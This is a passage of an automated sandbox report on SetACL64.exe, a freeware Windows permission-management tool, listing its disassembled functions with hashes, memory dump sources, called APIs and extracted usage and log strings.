                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
                                                  • String ID:
                                                  • API String ID: 959782435-0
                                                  • Opcode ID: 0144b5a661d66d38d76c24466dcf0781ce32cf37b2c1c40fd104419fcb5013a3
                                                  • Instruction ID: 390990b39bbc119b545ee2e925878d1b6025c69a392c59ff809ef66012ef3a69
                                                  • Opcode Fuzzy Hash: 0144b5a661d66d38d76c24466dcf0781ce32cf37b2c1c40fd104419fcb5013a3
                                                  • Instruction Fuzzy Hash: 24B13D72A08A4682E764FF22D4216B9B360FB48B68F804135EF5D436C6DFBCE552C760
                                                  Function 00007FF7C170E9D0 Relevance: .2, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 623b00d227a4fe3d8e7d417f2b5f2d0ceb4a2eacd56c3b69df033875c0a5ee96
                                                  • Instruction ID: 9f7712e4d617470bb3baa953ced5549df72a335a0c33bc628c3860dd9906ce02
                                                  • Opcode Fuzzy Hash: 623b00d227a4fe3d8e7d417f2b5f2d0ceb4a2eacd56c3b69df033875c0a5ee96
                                                  • Instruction Fuzzy Hash: 1A6118A2B18B8982EF109F5AD4405B9A360FB5C7A0F845231DF5E57B85DFBCE580C310
                                                  Function 00007FF7C175BD40 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
                                                  • Instruction ID: 2bd5bfa4c1cc718ce5768b5f69165fd38d0465cc88e463c11ef8e4472be83e2a
                                                  • Opcode Fuzzy Hash: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
                                                  • Instruction Fuzzy Hash: 80F06271B186958BDBA4DF6AA802629B7E0F74D3E0FD4C079D69D83B04DA7C90608F14
                                                  Function 00007FF7C1708A80 Relevance: 38.7, APIs: 4, Strings: 18, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7C1714810: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C171FCA1), ref: 00007FF7C1714859
                                                    • Part of subcall function 00007FF7C1714810: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C171FCA1), ref: 00007FF7C171486D
                                                    • Part of subcall function 00007FF7C1714810: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C171FCA1), ref: 00007FF7C1714882
                                                    • Part of subcall function 00007FF7C1714810: FreeResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7C171FCA1), ref: 00007FF7C1714964
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1708D9E
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1708DA4
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1708DAA
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1708DB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Resource_invalid_parameter_noinfo_noreturn$FindFreeLoadLock
                                                  • String ID: SetACL by Helge Klein$ -actn Action1 ParametersForAction1$ [-actn Action2 ParametersForAction2]$ [Options]$=======$==============$Copyright: Helge Klein$Documentation and examples are maintained at$Documentation:$FileVersion$Homepage: https://helgeklein.com$License: Freeware$SetACL -on ObjectName -ot ObjectType$Syntax:$The usage reference can be found at$Version: $https://helgeklein.com.$https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
                                                  • API String ID: 3000141576-3422969368
                                                  • Opcode ID: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
                                                  • Instruction ID: 61dd24703bdff151b1a3b22811721ab8af189c6c09d3983e8898944762119795
                                                  • Opcode Fuzzy Hash: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
                                                  • Instruction Fuzzy Hash: A9914B61F28A4294EB00FF66E8513B8A321BF98368FD14631D61E426E7DFACE554C360
                                                  Function 00007FF7C1758294 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17582AF
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17582CE
                                                    • Part of subcall function 00007FF7C1757998: GetProcAddress.KERNEL32(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757AF0
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17582ED
                                                    • Part of subcall function 00007FF7C1757998: LoadLibraryW.KERNELBASE(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757A3B
                                                    • Part of subcall function 00007FF7C1757998: GetLastError.KERNEL32(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757A49
                                                    • Part of subcall function 00007FF7C1757998: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757A8B
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C175830C
                                                    • Part of subcall function 00007FF7C1757998: FreeLibrary.KERNEL32(?,?,00000006,00007FF7C1757E8A,?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201), ref: 00007FF7C1757AC4
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C175832B
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C175834A
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C1758369
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C1758388
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17583A7
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C17583C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                  • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                  • API String ID: 3255926029-3252031757
                                                  • Opcode ID: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
                                                  • Instruction ID: dda93834399ea4f55fbf6d409dc141fef2ac1b7b1d438719afc7bed703b555ad
                                                  • Opcode Fuzzy Hash: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
                                                  • Instruction Fuzzy Hash: EF312660908E47A1F706FF56E8516F4A332AB0C364FC09437D10D169A79FBCA68AC3B1
                                                  Function 00007FF7C1721200 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 234COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: " $AddTrusteesFromFile$Input file for trustee operation opened: '
                                                  • API String ID: 0-3105513592
                                                  • Opcode ID: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
                                                  • Instruction ID: d3ba63d4f67677047ad29f7c406734e9729e6d01f8bb28768a649b90410a5bc5
                                                  • Opcode Fuzzy Hash: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
                                                  • Instruction Fuzzy Hash: B4A19E32A28B5284F700AFA5E8943EDA371FB58358F905435DA4C579ABDFBCE181C760
                                                  Function 00007FF7C171FC00 Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 467COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                                                  • String ID: on $====================================================================$FileVersion$SetLogFile$Starting SetACL.exe
                                                  • API String ID: 363805048-2110037876
                                                  • Opcode ID: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
                                                  • Instruction ID: c21c37464180961df1e7f76bfb7ef50d6800f9658bc5fe83bb084139e8491ad1
                                                  • Opcode Fuzzy Hash: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
                                                  • Instruction Fuzzy Hash: CF226562B1874581FB00AF69E4493ADA361EB997F4F905235DA6C03AEBDFBCD184C710
                                                  Function 00007FF7C173B8E0 Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 409COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$CreateDirectory
                                                  • String ID: ' could not be created because: $CreateDirectoryAPIWrapper$Created the directory '$Directory already exists: '$The directory '
                                                  • API String ID: 3201042626-1824261680
                                                  • Opcode ID: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
                                                  • Instruction ID: bef6867152fe67ce1cf78c07798d50f54f9a124ed10f14aad5ca5dea5712e083
                                                  • Opcode Fuzzy Hash: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
                                                  • Instruction Fuzzy Hash: 8B028362B58B4685FB04EF7AD4443AC6322AB497B8FC05231DA6C13AEADFBCD145C314
                                                  Function 00007FF7C1723755 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 185COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastVersion
                                                  • String ID: Prepare$SetACL only supports Windows Vista and later.$The version of your operating system could not be determined.
                                                  • API String ID: 1165008562-2181592180
                                                  • Opcode ID: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                                                  • Instruction ID: 0ea0e8a5bf3077e0abf5ad88bfc4b2642cb328f52b407f69b2f9194e5c2c8b73
                                                  • Opcode Fuzzy Hash: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                                                  • Instruction Fuzzy Hash: 3B71C871A5978781EB00AF66E0843ADA321EB497B4F905531E65D03AEBCFFCE151CB10
                                                  Function 00007FF7C17213D1 Relevance: 28.6, APIs: 19, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
                                                  • Instruction ID: a40fabca7492af1f7cdc2bc430f68b9eb86e15a7cdbc4b62a11754e0595ed385
                                                  • Opcode Fuzzy Hash: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
                                                  • Instruction Fuzzy Hash: 21315321AAA75740FB00BFAAA0E93BD9126EF6D774FD01830D70C065D7CEACA151C624
                                                  Function 00007FF7C173ECA0 Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 446shareCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Enum$CloseOpenResource
                                                  • String ID: > failed with: $GetUNCPathOfMappedDrive$Retrieving the remote path for mapped drive L<
                                                  • API String ID: 3788045339-1117730555
                                                  • Opcode ID: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
                                                  • Instruction ID: b3ea732363d7bd0766442469fa2f0cffcb18db2b9f283b96d9be61d4d21a0016
                                                  • Opcode Fuzzy Hash: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
                                                  • Instruction Fuzzy Hash: 40126162A1974181FB00AF6AE44436DA362EB887F4FD05235DB5D47AEADFBCE181C710
                                                  Function 00007FF7C173A2A0 Relevance: 25.7, APIs: 17, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A2F4
                                                  • GetAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A30D
                                                  • DeleteAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A338
                                                  • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A354
                                                  • GetLengthSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A361
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF7C17399CE), ref: 00007FF7C173A37F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: DeleteErrorInformationLastLengthValid
                                                  • String ID:
                                                  • API String ID: 1967920013-0
                                                  • Opcode ID: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
                                                  • Instruction ID: 4164faf0b9df3911969512e91c2e6e535cd948e1383c6bd527af630d99ce75f3
                                                  • Opcode Fuzzy Hash: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
                                                  • Instruction Fuzzy Hash: DC819422B0C68282EB50BF23955523DB7A0BF99BA4F944035ED8E83796DFBCD4048721
                                                  Function 00007FF7C173AA60 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 239memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: String$ArraySafe$AllocFree$BoundConcurrency::cancel_current_taskDataVariant$AccessClearInitUnaccess
                                                  • String ID: GetSD$__systemsecurity=@
                                                  • API String ID: 2119716662-3672729512
                                                  • Opcode ID: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
                                                  • Instruction ID: 89a7ce9fe4282842bff5e73d7913a07ea32c84d12b45e354925f98917b19ff41
                                                  • Opcode Fuzzy Hash: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
                                                  • Instruction Fuzzy Hash: 5F915232A09B4282EB54EF12E411379F3A4EF89BA0F944435DA4D83B96DFBDD544C760
                                                  Function 00007FF7C1723623 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: Prepare$The object type was not specified.
                                                  • API String ID: 3668304517-3861202280
                                                  • Opcode ID: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
                                                  • Instruction ID: fcc4e7bedf506610f4495e0ea6a5a454b8372bea308d67155ed834ec87feb870
                                                  • Opcode Fuzzy Hash: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
                                                  • Instruction Fuzzy Hash: 0931D721A6964781EB00BF66E0853AEA325EF593B4F901531E65C036EBCEBCD151CB14
                                                  Function 00007FF7C1739200 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 392COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_SetgloballocaleValidstd::locale::_
                                                  • String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
                                                  • API String ID: 2555488030-3371799133
                                                  • Opcode ID: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
                                                  • Instruction ID: 5942aa49ac364bbfadb9760686cad4fad086d80cf9e47f93614730484d957f08
                                                  • Opcode Fuzzy Hash: 466707cee54b4337e627ad1c5b082164c4624fdca99e4cbe8ccd6642e64db4c1
                                                  • Instruction Fuzzy Hash: 15029472A15B4185FB00EF66E4443ADA761EB987B8F905235DA5D03BE6DFBCE180C310
                                                  Function 00007FF7C171D760 Relevance: 22.7, APIs: 15, Instructions: 223synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
